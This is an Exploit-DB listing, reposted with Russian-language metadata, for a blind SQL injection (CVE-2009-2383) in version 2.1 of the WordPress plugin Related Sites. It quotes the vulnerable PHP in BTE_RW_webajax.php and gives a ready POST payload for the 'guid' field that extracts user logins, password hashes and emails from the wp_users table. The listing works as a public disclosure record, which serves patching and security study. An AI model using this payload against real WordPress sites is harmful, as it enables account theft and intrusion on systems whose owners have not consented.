- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9054
- Проверка EDB
-
- Пройдено
- Автор
- ELWAUX
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-2383
- Дата публикации
- 2009-06-30
Код:
WordPress Plugin Related Sites 2.1 BlindSQLinj Vuln
http://wordpress.org/extend/plugins/related-sites/
/wp-content/plugins/related-sites/BTE_RW_webajax.php
eLwaux(c) 30.05.2009, uasc.org.ua
SQL-Inj
27: $guid = $_POST['guid'];
28: $click = $_POST['click'];
31: $ref = $_SERVER["HTTP_REFERER"];
40: if ($guid!="" && $click!="" && $hostname!="" && $ipaddr!="" && $ref!="") {
53: $sql = "INSERT INTO $clicks_table_name (guid,click) VALUES ('$guid','$clickinfo')";
55: }
exploit:
POST: guid = 0', (select concat_ws(0x3a,user_login,user_pass,user_nicename,user_email) from wp_users where ID>0 and user_status=0 limit 1 ) );--
POST: click = .
HTTP_REFERER = .
# milw0rm.com [2009-06-30]- Источник
- www.exploit-db.com
